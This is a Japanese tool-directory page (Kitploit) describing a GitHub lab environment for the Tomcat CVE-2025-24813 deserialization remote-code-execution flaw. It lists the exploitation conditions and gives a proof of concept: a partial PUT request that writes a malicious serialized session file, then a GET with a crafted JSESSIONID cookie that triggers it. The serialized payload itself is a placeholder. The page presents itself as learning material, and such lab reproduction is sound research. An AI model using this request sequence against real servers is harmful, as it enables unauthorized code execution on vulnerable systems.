Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-24813 — tomcat CVE-2025-24813 逆シリアル化RCE環境 | Kitploit
ツール/GitHubGitHub/x1ongsec/cve-2025-24813
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubx1ongsec/cve-2025-24813

CVE-2025-24813

tomcat CVE-2025-24813 逆シリアル化RCE環境

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

説明

このリポジトリは、CVE-2025-24813 Tomcat 最新のRCE再現環境です。

学習研究目的のみに使用してください!

利用条件

  • アプリケーションでDefaultServletの書き込み機能が有効になっていること(デフォルトでは無効)
  • アプリケーションがpartial PUTリクエストをサポートしており、悪意のあるシリアライズデータをセッションファイルに書き込めること(デフォルトで有効)
  • アプリケーションがTomcatのファイルセッション永続化を使用し、デフォルトのセッション保存場所を使用していること(追加設定が必要)
  • アプリケーションがデシリアライゼーション脆弱性のあるライブラリ(例:クラスパス上のcommons-collections)を含んでいること。この条件は、業務実装がデシリアライゼーション利用チェーンを持つライブラリに依存しているかどうかに依存する

本環境では上記の再現に必要な条件が有効になっています

Tomcatの起動

Linux:

root@kitploit:~
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run

Windows:

root@kitploit:~
apache-tomcat-9.0.98/bin/catalina.bat run

アクセス:http://127.0.0.1:9001/

image

POC

悪意のあるシリアライズファイルを生成し、以下のデータパケットを使用してアップロードします。Rangeのチャンク値はLengthと一致し、かつ現在のファイル長より大きい必要があることに注意してください。

root@kitploit:~
PUT /xxxxx/session HTTP/1.1  
Host: 192.168.131.32:8080  
Content-Length: 1000  
Content-Range: bytes 0-1000/1200  

{{反序列化文件内容)}}

以下のPOCを使用してトリガーします:

root@kitploit:~
GET / HTTP/1.1  
Host: 192.168.131.32:8080  
Cookie: JSESSIONID=.xxxxx
image image

参考:https://forum.butian.net/article/674

ツールをダウンロード